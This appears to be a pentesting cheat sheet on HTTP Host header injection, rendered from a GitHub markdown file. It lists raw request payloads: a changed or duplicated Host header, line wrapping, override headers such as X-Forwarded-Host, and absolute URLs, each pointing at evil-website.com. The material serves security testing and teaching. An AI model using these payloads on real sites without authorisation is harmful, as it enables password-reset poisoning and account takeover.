Skip to content

Latest commit

 

History

History
54 lines (50 loc) · 1.47 KB

Host Header Injection.md

File metadata and controls

54 lines (50 loc) · 1.47 KB

Host Header Injection

Introduction

HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.

Where to find

In the feature where the website can send email to us. For example forgot password / newsletter.

How to exploit

  1. Change the host header
GET /index.php HTTP/1.1
Host: evil-website.com
...
  1. Duplicating the host header
GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
...
  1. Add line wrapping
GET /index.php HTTP/1.1
 Host: vulnerable-website.com
Host: evil-website.com
...
  1. Add host override headers
X-Forwarded-For: evil-website.com
X-Forwarded-Host: evil-website.com
X-Client-IP: evil-website.com
X-Remote-IP: evil-website.com
X-Remote-Addr: evil-website.com
X-Host: evil-website.com

How to use? In this case im using "X-Forwarded-For : evil.com"

GET /index.php HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For : evil-website.com
...
  1. Supply an absolute URL
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
...

References